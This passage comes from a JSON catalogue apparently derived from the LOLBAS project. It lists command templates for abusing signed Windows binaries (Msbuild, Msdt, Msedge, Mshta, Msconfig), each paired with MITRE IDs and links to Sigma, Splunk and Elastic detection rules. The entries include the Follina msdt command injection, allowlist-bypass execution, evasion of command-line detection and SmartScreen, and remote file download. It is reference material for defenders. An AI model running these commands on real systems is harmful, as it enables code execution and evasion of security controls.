(x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:1","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.csproj}","description":"Build and execute a C# project stored in the target csproj file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:2","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo","description":"Executes generated Logger DLL file with TargetLogger export.","usecase":"Execute DLL","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:3","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.proj}","description":"Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.","usecase":"Execute project file that contains XslTransformation tag parameters","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:4","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe @{PATH:.rsp}","description":"By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msconfig-exe:0","toolId":"lolbas:msconfig-exe","toolName":"Msconfig.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Msconfig.exe -5","description":"Executes command embeded in crafted c:\\windows\\system32\\mscfgtlc.xml.","usecase":"Code execution using Msconfig.exe","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\msconfig.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml"},{"type":"IOC","value":"mscfgtlc.xml changes in system32 folder"}],"references":["https://twitter.com/pabraeken/status/991314564896690177","https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"]},{"id":"lolbas:msdt-exe:0","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"]},{"id":"lolbas:msdt-exe:1","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code bypass Application whitelisting","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"]},{"id":"lolbas:msdt-exe:2","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe /id PCWDiagnostic /skip force /param \"IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe\"","description":"Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the \"PCWDiagnostic\" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Execute code bypass Application allowlisting","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"]},{"id":"lolbas:msedge-exe:0","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe {REMOTEURL:.exe.txt}","description":"Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"]},{"id":"lolbas:msedge-exe:1","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"{REMOTEURL:.base64.html}\" > {PATH:.b64}","description":"Edge will silently download the file. File extension should be .html and binaries should be encoded.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"]},{"id":"lolbas:msedge-exe:2","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedge.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"]},{"id":"lolbas:mshta-exe:0","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe {PATH:.hta}","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"